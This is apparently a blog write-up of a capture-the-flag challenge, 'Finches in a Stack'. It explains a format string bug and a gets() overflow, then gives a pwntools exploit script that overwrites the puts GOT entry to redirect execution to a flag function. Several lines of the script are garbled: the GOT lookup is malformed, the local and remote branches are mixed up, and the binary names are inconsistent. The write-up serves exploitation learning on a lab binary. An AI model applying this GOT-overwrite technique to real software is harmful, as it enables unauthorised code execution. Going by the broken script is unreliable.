Finches in a Stack (Unintentional Way)


This challenge wasn’t suppose to be solved like this when I was discussing it with the author. To check out the intentional way, check out Finches in PIE. It is similar to this one except, PIE is enabled.



flag.txt (You need this in same directory as fiap for local exploit. fiap will read flag once you exploit it)


When you run the program, it will ask you for two inputs. And it talks about canary. I am guessing that you have to leak the canary and over ride the ret with the first input. Then fix the overwritten canary with the leaked canary.

Static Analysis

There is handy function called flag that prints out the flag

In say_hi(), we can see that the first_input can be used for format string vuln.

Second input also uses gets() so we can use it for BoF.


Looking at this problem, you can just use format string exploit to write to since after printf(&first_input) it will run puts and since we don’t return, we can go to flag function.

from pwn import *

isLocal = True

if isLocal:
    p = process("./fias")
    p = remote("", 34995)

elf = ELF("./fias")

GOT_PUTS =['puts'] # 0x804c01c
FUNC_FLAG = elf.sym['flag'] # 0x080491d2
#Flag addr 0x080491d2 
p.sendline(p32(GOT_PUTS+2) + '@@@@' + p32(GOT_PUTS) + '%.8x' * 4 + '%.2008x%hn' + '%.35278x%hn')



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s